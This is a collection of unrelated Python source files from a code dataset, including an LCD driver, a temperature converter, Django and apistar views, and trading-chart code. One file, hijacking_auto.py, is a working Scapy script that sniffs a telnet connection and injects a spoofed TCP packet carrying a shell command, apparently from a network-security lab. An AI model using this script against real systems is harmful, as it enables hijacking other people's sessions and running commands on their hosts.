self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n\n\n def rightToLeft(self):\n \"\"\" This is for text that flows right to left \"\"\"\n self.displaymode &= ~self.LCD_ENTRYLEFT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n\n\n def autoscroll(self):\n \"\"\" This will 'right justify' text from the cursor \"\"\"\n self.displaymode |= self.LCD_ENTRYSHIFTINCREMENT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)
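# --- Hedged aside, not part of lcd6x20.py: the methods above all follow one
# bit-flag idiom -- keep a shadow control byte, set/clear/toggle a flag with
# |=, &= ~, or ^=, then resend the whole byte to the controller. Standalone
# sketch using the usual HD44780 flag values (assumed, matching common drivers):
LCD_DISPLAYON, LCD_CURSORON, LCD_BLINKON = 0x04, 0x02, 0x01

state = LCD_DISPLAYON
state |= LCD_CURSORON    # cursor on
state &= ~LCD_BLINKON    # blink forced off
state ^= LCD_CURSORON    # toggle the cursor back off
assert state == LCD_DISPLAYON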
\n\n\n def noAutoscroll(self):\n \"\"\" This will 'left justify' text from the cursor \"\"\"\n self.displaymode &= ~self.LCD_ENTRYSHIFTINCREMENT\n self.write_lcd(self.LCD_DATA_E1, self.LCD_ENTRYMODESET | self.displaymode)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_ENTRYMODESET | self.displaymode)\n\n\n def createChar(self, location, bitmap):\n self.write_lcd(self.LCD_DATA_E1, self.LCD_SETCGRAMADDR | ((location & 7) << 3))\n self.write_lcd(self.LCD_DATA_E1, bitmap, True)\n self.write_lcd(self.LCD_DATA_E1, self.LCD_SETDDRAMADDR)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_SETCGRAMADDR | ((location & 7) << 3))\n self.write_lcd(self.LCD_DATA_E2, bitmap, True)\n self.write_lcd(self.LCD_DATA_E2, self.LCD_SETDDRAMADDR)\n\n\n def message(self, text):\n \"\"\" Send string to LCD. Newline wraps to second line\"\"\"\n lines = str(text).split('\\n') # Split at newline(s)\n for i, line in enumerate(lines): # For each substring...\n if i > 0: # If newline(s),\n self.write_lcd(self.LCD_DATA_E1, 0xC0) # set DDRAM address to 2nd line\n self.write_lcd(self.LCD_DATA_E1, line, True) # Issue substring\n\n\n def message_line(self, line_nr, text):\n self.setCursor(0, line_nr)\n self.write_lcd(self.row_chip_select[line_nr], text, True)\n\n\n def message_line_pos(self, line_nr, pos, text):\n self.setCursor(pos, line_nr)\n self.write_lcd(self.row_chip_select[line_nr], text, True)\n\n\n def backlight(self, onoff):\n self.led = onoff\n self.writeRegister( self.MCP23008_GPIO, self.led )\n\n","sub_path":"python/webiopi/devices/lcd/lcd6x20.py","file_name":"lcd6x20.py","file_ext":"py","file_size_in_byte":16348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"90201781","text":"'''\nTemp_convertor.py\nCreated by Teddy Putus 16/10/2012\nModified by Teddy Putus 17/10/2012\n - Added reset\n - Added Error checking for type input/output\n'''\n\n#Allows for restart\nrestart=int('1')\nwhile restart==1:\n\n#Find input type\n print(\"Welcome to the celsius-fahrenheit-kelvin converter\")\n select=input('Please select input type\\n 1-Celsius\\n 2-Fahrenheit\\n 3-Kelvin\\n')\n\n#Check they have entered a correct choice\n while select!= str('1') and select!=str('2') and select!=str('3'):\n select=input('That is not a valid choice, please enter a digit between 1 and 3\\n')\n\n#Find output type\n select2=input('Please select output type\\n 1-Celsius\\n 2-Fahrenheit\\n 3-Kelvin\\n')\n\n#Check they have entered a correct choice\n while select2!= str('1') and select2!=str('2') and select2!=str('3'):\n select2=input('That is not a valid choice, please enter a digit between 1 and 3\\n')\n\n#Convert to integers and see if there's a point to the calculation\n sel_in=int(select)\n sel_in_2=int(select2)\n while sel_in==sel_in_2:\n select=input('That value does not need converting, please select another input type\\n 1-Celsius\\n 2-Fahrenheit\\n 3-Kelvin\\n')\n select2=input('Please select another output type\\n 1-Celsius\\n 2-Fahrenheit\\n 3-Kelvin\\n')\n sel_in=int(select)\n sel_in_2=int(select2)\n\n#Convert as appropriate\n if sel_in==1:\n temp=input('Enter your temperature in celsius: ')\n temp_int=float(temp)\n if sel_in_2==2:\n result=(temp_int*1.8)+32\n print(temp_int,'celsius is', result, 'fahrenheit')\n else:\n if sel_in_2==3:\n result=temp_int+273.15\n print(temp_int, 'celsius is', result, 'kelvin')
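# --- Hedged aside, not part of the converter script: the six conversions its
# branches implement, collected into one lookup table keyed by (source, target)
# scale so the formulas can be checked at a glance. Sketch only:
CONVERT = {
    ('C', 'F'): lambda t: t * 1.8 + 32,
    ('C', 'K'): lambda t: t + 273.15,
    ('F', 'C'): lambda t: (t - 32) / 1.8,
    ('F', 'K'): lambda t: (t - 32) / 1.8 + 273.15,
    ('K', 'C'): lambda t: t - 273.15,
    ('K', 'F'): lambda t: (t - 273.15) * 1.8 + 32,
}
assert CONVERT[('C', 'F')](100) == 212.0  # boiling point sanity check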
\n\n if sel_in==2:\n temp=input('Enter your temperature in fahrenheit: ')\n temp_int=float(temp)\n if sel_in_2==1:\n result=(temp_int-32)/1.8\n print(temp_int,'fahrenheit is', result, 'celsius')\n else:\n if sel_in_2==3:\n result=((temp_int-32)/1.8)+273.15\n print(temp_int, 'fahrenheit is', result, 'kelvin')\n\n if sel_in==3:\n temp=input('Enter your temperature in kelvin: ')\n temp_int=float(temp)\n if sel_in_2==1:\n result=temp_int-273.15\n print(temp_int,'kelvin is', result, 'celsius')\n else:\n if sel_in_2==2:\n result=((temp_int-273.15)*1.8)+32\n print(temp_int, 'kelvin is', result, 'fahrenheit')\n#Restart choice\n restart_choice=input('Would you like to convert again? y/n')\n if restart_choice==str('y') or restart_choice==str('Y'):\n restart=int('1')\n else:\n if restart_choice==str('n') or restart_choice==str('N'):\n restart=int('0')\n else:\n while restart_choice!=str('y') and restart_choice!=str('Y') and restart_choice!=str('n') and restart_choice!=str('N'):\n restart_choice=input(\"That wasn't a valid choice, please select y/n\")\n if restart_choice==str('n') or restart_choice==str('N'):\n restart=int('0')\n","sub_path":"python/temp_convertor_reset.py","file_name":"temp_convertor_reset.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"249799976","text":"pyg = 'ay'\nvar = 1\n\nwhile var == 1:\n original = input('Enter a word: ')\n if len(original) > 0 and original.isalpha():\n word = original.lower()\n first = word[0]\n new_word = word[1:len(word)] + first + pyg\n print (new_word)\n try_again = input('Would you like to go again? Y/N ')\n if try_again == 'N':\n var = 2\n print ('Goodbye!')\n elif len(original) == 0:\n print ('You have not entered a word! ')\n elif len(original) > 0 and original.isdigit():\n print ('Real words are not numbers! Try again. ')\n elif original.isalpha() and original.isdigit():\n print ('Please type words, not passwords. No numbers! ')\n else:\n print ('Try again! ')\n","sub_path":"PygLatin.py","file_name":"PygLatin.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"295501312","text":"#!/usr/bin/python3\nfrom scapy.all import *\n\nSRC = \"172.17.0.4\"\nDST = \"172.17.0.3\"\nPORT = 23\n\ndef spoof(pkt):\n old_ip = pkt[IP]\n old_tcp = pkt[TCP]\n\n #############################################\n ip = IP( src = old_ip.src,\n dst = old_ip.dst\n )\n tcp = TCP( sport = old_tcp.sport,\n dport = old_tcp.dport,\n seq = old_tcp.seq+1,\n ack = old_tcp.ack+1,\n flags = \"A\"\n )\n data = \"\\n ls \\n\"\n #############################################\n\n pkt = ip/tcp/data\n send(pkt,verbose=0)\n ls(pkt)\n quit()\n\nf = 'tcp and src host {} and dst host {} and dst port {}'.format(SRC, DST, PORT)\nsniff(filter=f, prn=spoof)\n\n","sub_path":"VPN实验补充/scapyCode/hijacking_auto.py","file_name":"hijacking_auto.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"393152771","text":"import os\nfrom pathlib import Path\nimport numpy as np\nimport mne\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\n\ndirname = \"edf_png/\"\ntime_window = 1\n\n\n# color codes used when drawing the graphs\ncolor_list = []\nfor cname in matplotlib.colors.cnames.values():\n color_list.append(cname)\n\n# create the folder for the image files in the current directory\nos.makedirs(dirname, exist_ok = True)\n\n# load an edf file from the edfdata folder\nedf_dir = Path(\"/Users/keisuke/b3_task/edfdata\")\nedf = mne.io.read_raw_edf(next(edf_dir.glob(\"*.edf\")),\n preload = True)\nedf.drop_channels('PHOTIC PH')\nsfreq = float(edf.info[\"sfreq\"])\nntimes = float(edf.n_times)\n\n# generate the images\ndef export():\n data = edf.get_data()\n for count in range(int(ntimes/(sfreq * time_window))):\n # for count in range(10):\n # data = edf.get_data(start = int(edf.time_as_index(count)),\n # stop = int(edf.time_as_index(count + 1)))\n for i, ch in enumerate(edf.ch_names):\n plt.plot(data[i, count * time_window * 250 : (count + 1) * time_window * 250],\n label = ch, color = color_list[i])\n\n plt.savefig(dirname + \"file_{0}.png\".format(count + 1))\n plt.close()\n\nexport()\n","sub_path":"edf_to_png.py","file_name":"edf_to_png.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"465544498","text":"from django.shortcuts import render\nimport requests\nimport json\nfrom django.http import JsonResponse\n\n# Create your views here.\ndef editor(request):\n data={}\n\n return render(request, 'pages/editor.html',data)\n\n\ndef postCode(request):\n url = 'https://tpcg.tutorialspoint.com/tpcg.php'\n cod = request.POST.get('contentA')\n print('code----------' ,cod)\n\n data = {\n 'lang': 'python',\n 'device': '',\n 'code': cod,\n 'stdinput': '',\n 'ext': 'py',\n 'compile': '0',\n 'execute': 'python main.py',\n 'mainfile': 'main.py',\n 'uid': '5116890',\n }\n req = requests.post(url, data = data)\n resultat = req.text\n print(resultat)\n # print(req.status_code)\n # print(req.text)\n datas = {\n 'succes':True,\n 'resultat': resultat\n }\n return JsonResponse(datas, safe=False)\n#django-admin-interface","sub_path":"projetvideo/editor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"391065250","text":"import os\n\n\nPROGRAM_NAME = 'qua'\n\nAPP_NAME = PROGRAM_NAME\n\nVAR = 
'/var'\n\nVAR_LIB = os.path.join(VAR, 'lib')\n\nVAR_LOG = os.path.join(VAR, 'log')\n\nLOGS_DIR = os.path.join(VAR_LOG, PROGRAM_NAME)\n\nDATA_DIR = os.path.join(VAR_LIB, PROGRAM_NAME, 'data')\n\nELASTICSEARCH = {\n 'hosts': ['esserver'],\n 'timeout': 30,\n 'max_retries': 10,\n 'retry_on_timeout': True\n}\n\nREDIS = {\n 'host': 'redisserver',\n 'port': 6379,\n 'db_cache': 0,\n 'db_persistent': 1\n}\n\nPOSTGRESQL = {\n 'host': 'postgresserver',\n 'port': '5432',\n 'user': 'quauser',\n 'password': 'somestrongdbpassword',\n 'engine': 'django.db.backends.postgresql_psycopg2'\n}\n\nMAX_SEARCH_RESULTS = 100\n\nSERP_SIZE = 10\n\nES_DOCTYPE = 'main'\n\nES_SEARCH_INDEX = PROGRAM_NAME + '_search'\n\nES_SPELLING_INDEX = PROGRAM_NAME + '_spelling'\n\nSEARCH_FIELDS = ['title^4', 'keywords^2', 'text']\n","sub_path":"common/qua/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"280909","text":"import json\nfrom typing import List\n\nfrom apistar import App, Route, types, validators\nfrom apistar.http import JSONResponse\n\n\ndef _load_application_data():\n with open('MOCK_DATA.json') as f:\n applications = json.loads(f.read())\n return {application[\"id\"]: application for application in applications}\n\n\napplications = _load_application_data()\n\nVALID_COMPANIES = set([application[\"company_name\"] for application in applications.values()])\nAPP_NOT_FOUND = 'Application not found'\n\n\nclass Application(types.Type):\n id = validators.Integer(allow_null=True) # assign in POST\n app_name = validators.String(max_length=100)\n app_version = validators.String(max_length=100)\n logo = validators.String(max_length=100)\n company_name = validators.String(enum=list(VALID_COMPANIES))\n\n\ndef list_applications() -> List[Application]:\n return [Application(application[1]) for application in sorted(applications.items())]\n\n\ndef create_application(application: Application) -> JSONResponse:\n application_id = len(applications) + 1\n application.id = application_id\n applications[application_id] = application\n return JSONResponse(Application(application), status_code=201)\n\n\ndef get_application(application_id: int) -> JSONResponse:\n application = applications.get(application_id)\n\n if not application:\n error = {'error': APP_NOT_FOUND}\n return JSONResponse(error, status_code=404)\n\n return JSONResponse(Application(application), status_code=200)\n\n\ndef update_application(application_id: int, application: Application) -> JSONResponse:\n if not applications.get(application_id):\n error = {'error': APP_NOT_FOUND}\n return JSONResponse(error, status_code=404)\n\n application.id = application_id\n applications[application_id] = application\n return JSONResponse(Application(application), status_code=200)\n\n\ndef delete_application(application_id: int) -> JSONResponse:\n if not applications.get(application_id):\n error = {'error': APP_NOT_FOUND}\n return JSONResponse(error, status_code=404)\n\n del applications[application_id]\n return JSONResponse({}, status_code=204)\n\n\nroutes = [\n Route('/', method='GET', handler=list_applications),\n Route('/', method='POST', handler=create_application),\n Route('/{application_id}/', method='GET', handler=get_application),\n Route('/{application_id}/', method='PUT', handler=update_application),\n Route('/{application_id}/', method='DELETE', handler=delete_application),\n]\n\napp = App(routes=routes)\n\nif __name__ == '__main__':\n 
app.serve('127.0.0.1', 5000, debug=True)\n","sub_path":"days/009-012-modern-apis-starred/your-turn/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"449371092","text":"#!/usr/bin/python\n################################################################################\n# HTTPS INTERFACE\n#\n# Justin Dierking\n# justin.l.dierking.civ@mail.mil\n# (614) 692 2050\n#\n# 07/27/2017 Original construction\n################################################################################\n\nSESSION_TIMEOUT = 90\n\nimport json\nimport traceback\nimport ssl\nimport hashlib\nimport httplib\nimport urllib2\n\nfrom threading import Lock, Thread, Timer\nfrom time import time, sleep\nfrom ..controller.messaging import add_message\n\nglobal https_sessions\nhttps_sessions = {}\n\ndef create_session(url):\n trys = 0\n \n while trys < 3:\n try:\n trys += 1\n \n req = urllib2.Request(url = url)\n \n https_sessions[url] = {}\n https_sessions[url][\"lock\"] = Lock()\n https_sessions[url][\"contact\"] = time()\n https_sessions[url][\"full url\"] = req.get_full_url() \n https_sessions[url][\"connection\"] = httplib.HTTPSConnection(req.get_host(), \\\n context = ssl._create_unverified_context(), \\\n timeout = 15)\n \n return True\n except Exception:\n add_message(traceback.format_exc())\n del https_sessions[url]\n sleep(1)\n \n raise Exception(str(traceback.format_exc()))\n\ndef destroy_session(url):\n try:\n https_sessions[url][\"connection\"].close()\n except Exception:\n add_message(traceback.format_exc())\n del https_sessions[url]\n\ndef send_json(url, json_in, secret_digest):\n if url not in https_sessions:\n create_session(url)\n\n raw_json_in = json.dumps(json_in)\n \n h = hashlib.sha256()\n h.update(secret_digest)\n h.update(raw_json_in)\n \n headers = {\n 'Content-Type' : 'application/json',\n 'Signature' : h.hexdigest()\n }\n \n trys = 0\n \n while trys < 3:\n try:\n trys += 1\n \n https_sessions[url][\"lock\"].acquire()\n https_sessions[url][\"contact\"] = time()\n https_sessions[url][\"connection\"].request(\"POST\", \\\n https_sessions[url][\"full url\"], \\\n raw_json_in, \\\n headers)\n response = https_sessions[url][\"connection\"].getresponse()\n signature = response.getheader(\"Signature\")\n raw_json_out = response.read()\n https_sessions[url][\"lock\"].release()\n \n h = hashlib.sha256()\n h.update(secret_digest)\n h.update(raw_json_out)\n \n if h.hexdigest() != signature:\n raise Exception(\"Signature mismatch encountered!\")\n \n return json.loads(raw_json_out)\n except Exception:\n add_message(traceback.format_exc())\n https_sessions[url][\"lock\"].release()\n destroy_session(url)\n sleep(1)\n \n raise Exception(str(traceback.format_exc()))\n \ndef worker():\n Timer(60.0, worker).start()\n\n try:\n stale_urls = []\n \n for k, v in https_sessions.iteritems():\n try:\n if time() - v[\"contact\"] > SESSION_TIMEOUT:\n stale_urls.append(k)\n except Exception:\n stale_urls.append(k)\n \n for url in stale_urls:\n destroy_session(url)\n\n except Exception:\n add_message(traceback.format_exc())\n \nThread(target = worker).start()","sub_path":"dev5/interface/httpsint.py","file_name":"httpsint.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"46288056","text":"# coding = utf-8\nimport requests\nimport json\n\ndef read():\n count = 0\n with 
open('D:\\\\desktop\\\\ccid.txt',encoding='utf-8') as open_file:\n for line in open_file:\n ## assemble the json payload\n data = {}\n data['prodCode'] ='QYL'\n data['userId'] = str(line.strip())\n data['overdueDegree'] = 'm1'\n data['isPayOff'] = '1'\n data['overdueDays'] = 1\n #print(json.dumps(data))\n count += 1\n print(count)\n ## call the http endpoint\n result = post(json.dumps(data))\n if 'SUCCESS' != result:\n print('Exception encountered......'+str(line.strip()))\n break\n\n\ndef post(json_data):\n #url = \"http://106.15.201.163:81/risk-auditing-service/risk/overdue/dealOverdue\"\n url = \"http://proxy.namifunds.com:8105/risk-auditing-service/risk/overdue/dealOverdue\"\n \n headers = {'content-type': 'application/json'}\n r = requests.post(url,data=json_data,headers=headers)\n return r.text\n\n\n\nif __name__ == '__main__':\n #main()\n read()","sub_path":"http/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"372895852","text":"import json, re, os\n\ndef save_json(json_dict, output_file):\n \"\"\"\n Function that exports the contents of a json block to a file\n \"\"\"\n if not os.path.exists('data'):\n os.makedirs('data')\n \n with open(output_file, 'w') as file:\n json.dump(json_dict, file)\n\n\ndef clean_emojis(tweet):\n \"\"\"\n The approach for removing emojis was taken from this\n StackOverflow thread: https://stackoverflow.com/a/33417311/3356476\n :param tweet:\n :return:\n \"\"\"\n # Pattern to recognise and strip emojis\n emoji_pattern = re.compile(\"[\"\n u\"\\U0001F600-\\U0001F64F\"\n u\"\\U0001F300-\\U0001F5FF\"\n u\"\\U0001F680-\\U0001F6FF\"\n u\"\\U0001F1E0-\\U0001F1FF\"\n \"]+\", flags=re.UNICODE)\n\n return emoji_pattern.sub(r'', tweet)\n\n\ndef formato_tweet(in_tweet):\n \"\"\"\n Extract the required info\n \"\"\"\n\n # Create the dictionary\n tweet = dict()\n\n # Get the user information\n tweet['usuario'] = in_tweet['user']['screen_name']\n tweet['localizacion'] = in_tweet['user']['location']\n tweet['seguidores'] = in_tweet['user']['followers_count']\n\n # Get the tweet text and strip emojis\n t_date = in_tweet['created_at']\n tweet['creado'] = t_date\n tweet_text = in_tweet['text']\n clean_tweet = clean_emojis(tweet_text)\n tweet['texto'] = clean_tweet\n tweet['fuentes'] = in_tweet['source']\n tweet['contador_caracteres'] = len(clean_tweet)\n tweet['contador_palabras'] = len(clean_tweet.split())\n\n # Return the cleaned tweet\n return tweet\n","sub_path":"librerias/utiles.py","file_name":"utiles.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"299320561","text":"# !/usr/bin/python3\n# coding:utf-8 \n# Author : mahua\n# Email : lihh3721@gmail.com\n# Time : 2019/4/20 9:15 AM\n# FileName : config.py\nfrom configparser import ConfigParser\nfrom API_prac.common import contants\n\n\nclass ReadConfig:\n\n def __init__(self,encoding=\"utf-8\"):\n # open the configuration files\n self.cf = ConfigParser()\n self.cf.read(contants.global_file,encoding) # load the global file\n switch = self.cf.getboolean('switch','on')\n if switch: # if the switch is on, read the pre-production env (pre); otherwise read test\n self.cf.read(contants.pre_file,encoding)\n else:\n self.cf.read(contants.test_file,encoding)\n\n def get_strValue(self,section,option):\n return self.cf.get(section,option)\n\nconfig = ReadConfig()\n\n# if __name__ == '__main__':\n# config = ReadConfig()\n","sub_path":"API_prac/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"141075800","text":"# Final Project Testing code.\n\n# import some common libraries\nfrom skimage.morphology import label\nfrom scipy import ndimage\nimport pandas as pd\nimport random\nimport os\nimport numpy as np\nimport cv2\n\n# import some common detectron2 utilities\nfrom detectron2.data.datasets import register_coco_instances\nfrom detectron2.utils.visualizer import ColorMode\nfrom detectron2.config import get_cfg\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\n\n# loading model, weights, dataset\nregister_coco_instances(\"test\", {}, \"./final_dataset/coco/test.json\", \"./final_dataset/coco/test_images\")\nnucleus_metadata = MetadataCatalog.get(\"nucleus\")\ndataset_dicts = DatasetCatalog.get(\"test\")\n# cfg was used below without being built; a base config is assumed here\n# (the matching training-time config for this checkpoint is not shown)\ncfg = get_cfg()\ncfg.MODEL.WEIGHTS = os.path.join(\"./output\", \"model_0014999.pth\")\n\n# set the testing threshold for this model\ncfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5\ncfg.DATASETS.TEST = (\"test\", )\npredictor = DefaultPredictor(cfg)\n\n# mask to RLE-code function\ndef rle_encoding(x):\n dots = np.where(x.T.flatten() == 1)[0]\n run_lengths = []\n prev = -2\n for b in dots:\n if (b>prev+1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n return run_lengths
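# --- Hedged aside, not part of Final-Project-Testing.py: rle_encoding() above
# emits Kaggle-style run-length pairs (1-indexed starts, column-major order).
# A matching decoder plus a round-trip check on a tiny mask, for illustration:
import numpy as np  # also imported above; repeated so this aside stands alone

def rle_decoding(runs, shape):
    flat = np.zeros(shape[0] * shape[1], dtype=np.uint8)
    for start, length in zip(runs[0::2], runs[1::2]):
        flat[start - 1:start - 1 + length] = 1   # starts are 1-indexed
    return flat.reshape(shape[::-1]).T           # undo the column-major flatten

tiny = np.array([[0, 1], [1, 1]], dtype=np.uint8)
assert rle_encoding(tiny) == [2, 3]
assert (rle_decoding([2, 3], tiny.shape) == tiny).all()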
\n\n# Testing\n# post-processing settings.\nscore_param = [0.8]\ninterarea_param = [0.1]\narea_param = [25]\n\nfor score_thres, area_inter_thres, area_threshold in zip(score_param, interarea_param, area_param):\n output = []\n for d in dataset_dicts:\n im = cv2.imread(d[\"file_name\"])\n # model output\n outputs = predictor(im)\n instances = outputs['instances']\n n = os.path.split(d[\"file_name\"])[1]\n image_id = n[:-4]\n\n # initial variables\n j = 0\n all_mask = None\n all_mask_no_refine = None\n # if the model made no prediction for this image, emit an empty encoding\n if(len(instances) < 1):\n out = ''\n output.append([image_id, out])\n else:\n # model predictions >= 1\n instances.pred_masks = instances.pred_masks.detach().cpu().numpy()\n\n for i in range(len(instances.pred_masks)):\n # if confidence < threshold\n if(instances.scores[i] < score_thres):\n j = j + 1\n continue\n else:\n # fill holes\n mask_int = ndimage.morphology.binary_fill_holes(instances.pred_masks[i].copy()).astype(np.uint8)\n # mask to [truth, false] value\n mask = mask_int > 0\n # original mask\n mask_orig = instances.pred_masks[i] > 0\n\n # init all_mask & all_mask_no_refine = False (size = mask), run only once.\n if all_mask is None:\n all_mask = mask.copy() # make same size\n all_mask[:] = False # setting all False\n all_mask_no_refine = mask_orig.copy()\n all_mask_no_refine[:] = False\n\n # intersection mask and all_mask\n intersection = mask & all_mask\n # sum intersection area\n area_inter = intersection.sum()\n # if this mask intersects all_mask and the overlap fraction exceeds area_inter_thres, ignore it!\n if area_inter > 0:\n total_area = mask.sum()\n if float(area_inter) / (float(total_area) + 0.00001) > area_inter_thres:\n j = j + 1\n continue\n\n # if the non-overlapping area is below the size threshold, ignore it!\n mask = mask & ~all_mask\n if mask.sum() < area_threshold:\n j = j + 1\n continue\n\n # setting mask_int no mask area = 0\n mask_int[~mask] = 0\n # add this mask to all_masks\n all_mask = mask | all_mask\n all_mask_no_refine = all_mask_no_refine | mask_orig\n # mask to [0, 1] value\n m = mask_int * 1\n # mask to RLE-code\n out = rle_encoding(m)\n s = str(out)\n s = s.replace('[', '')\n s = s.replace(']', '')\n s = s.replace(',', '')\n output.append([image_id, s])\n\n # if none of the predictions passed the score/overlap/area thresholds, emit an empty encoding\n if(j == len(instances.pred_masks)):\n out = ''\n output.append([image_id, out])\n\n # write csv file.\n submission = pd.DataFrame(output, columns=['ImageId', 'EncodedPixels']).astype(str)\n submission = submission[submission['EncodedPixels'] != 'nan']\n submission_filepath = os.path.join('./final_dataset/Result', 'submission_{}_{}_{}.csv'.format(score_thres, area_threshold, area_inter_thres))\n submission.to_csv(submission_filepath, index=None, encoding='utf-8')\n\n","sub_path":"Final-Project-Testing.py","file_name":"Final-Project-Testing.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"651459083","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\t# URL for the home page\n\tpath('', views.index, name='index'),\n\n\t# Area URLs\n\tpath('area/', views.lista_area, name='lista_area'),\n\tpath('area/', views.detalhes_area, name='detalhes_area'),\n\tpath('area/add', views.adicionar_area, name='adicionar_area'),\n\tpath('area//editar/', views.alterar_area, name='alterar_area'),\n\tpath('area//excluir/', views.excluir_area, name='excluir_area'),\n\tpath('area//ativar/', views.ativar_area, name='ativar_area'),\n\tpath('area//desativar/', views.desativar_area, name='desativar_area'),\n\n\t# News URLs\n\tpath('noticias/', views.lista_noticia, name='lista_noticia'),\t\n\tpath('noticia//', views.detalhes_noticia, name='detalhes_noticia'),\t\n\tpath('noticia/add', views.adicionar_noticia, name='adicionar_noticia'),\n\tpath('noticia//editar/', views.alterar_noticia, name='alterar_noticia'),\n\tpath('noticia//excluir/', views.excluir_noticia, name='excluir_noticia'),\n\tpath('noticia//publicar/', views.publicar_noticia, name='publicar_noticia'),\n]","sub_path":"portal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"392480551","text":"import base64\nimport datetime\nimport io\nimport os\nimport sys\n\nimport matplotlib\n\nmatplotlib.use('agg')\n\nimport mplfinance as mpf\nimport pandas as pd\nimport pandas_ta as ta\n\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\nfrom matplotlib import pyplot as plt\n\nfrom coin_data import CoinData\n\nplt.style.use('dark_background')\nimport numpy as np\nimport numba as nb\nimport csv\n\nfrom binance.client import Client\n\nclient = Client(os.getenv('bbot_pub'), os.getenv('bbot_sec'))\n\ndata_dict = {}\n\ndef read_data():\n with open('recent_trades.csv', newline='') as f:\n trade_reader = csv.reader(f, delimiter=' ', quotechar='|')\n for row in trade_reader:\n if row:\n # print()\n if row[1] not in data_dict.keys():\n data_dict[row[1]] = [[row[0]] + row[2:]]\n else:\n data_dict[row[1]].append([row[0]] + row[2:])\n return data_dict\n\n\n@nb.jit(fastmath=True, nopython=True)\ndef calc_rsi( array, deltas, avg_gain, avg_loss, n ):\n\n # Use Wilder smoothing method\n up = lambda x: x if x > 0 else 0\n down = lambda x: -x if x < 0 else 0\n i = n+1\n for d in deltas[n+1:]:\n avg_gain = ((avg_gain * (n-1)) + up(d)) / n\n avg_loss = ((avg_loss * (n-1)) + down(d)) / n\n if avg_loss != 0:\n rs = avg_gain / avg_loss\n array[i] = 100 - (100 / (1 + rs))\n else:\n array[i] = 100\n i += 1\n\n return array\n\ndef get_rsi( array, n = 14 ):\n\n deltas = np.append([0],np.diff(array))\n\n avg_gain = 
np.sum(deltas[1:n+1].clip(min=0)) / n\n avg_loss = -np.sum(deltas[1:n+1].clip(max=0)) / n\n\n array = np.empty(deltas.shape[0])\n array.fill(np.nan)\n\n array = calc_rsi( array, deltas, avg_gain, avg_loss, n )\n return array\n\nclass Charts:\n\n def __init__(self, symbol='BTCUSDT', tf='1h', entry=None, direction=None):\n \"\"\"When initialised, creates chart for given symbol and timeframe\n :param symbol: str uppercase eg. 'BTCUSDT'\n :param tf: str lowercase eg. '1m', '15m', '1h', '4h'\n :param entry: float if open positions\n :param direction: str 'LONG', 'SHORT' or None depending on position\"\"\"\n self.symbol = symbol.upper()\n self.tf = tf\n self.df = CoinData.get_dataframe(self.symbol, self.tf)\n self.df = self.df_ta()\n self.entry = entry\n self.direction = True if direction == 'LONG' else False\n self.tp = 0.03\n self.sl = 0.01\n\n def df_ta(self) -> pd.DataFrame:\n df = self.df\n # df['rsi'] = ta.rsi(df.close, 14)\n df['rsi'] = get_rsi(df.close, 14)\n df = pd.concat((df, ta.macd(df.close, 12, 26, 9)), axis=1)\n df['ema_20'], df['ema_50'] = ta.ema(df.close, 20), ta.ema(df.close, 50)\n if len(df) >= 288:\n df['ema_200'] = ta.ema(df.close, 200)\n else:\n df['ema_200'] = ta.ema(df.close, len(df.close) - 3)\n df = df.tail(88)\n return df\n\n def trades_series(self, symbol):\n d = read_data()\n for key in d.keys():\n if key == symbol:\n trades = [{'datetime': datetime.datetime.strptime(d[symbol][i][0], \"%Y-%m-%d %H:%M:%S.%f\"), 'price': d[symbol][i][2]} for i in range(len(d[symbol]))]\n df = pd.DataFrame(trades)\n df.set_index('datetime', inplace=True)\n df.rename_axis('date', 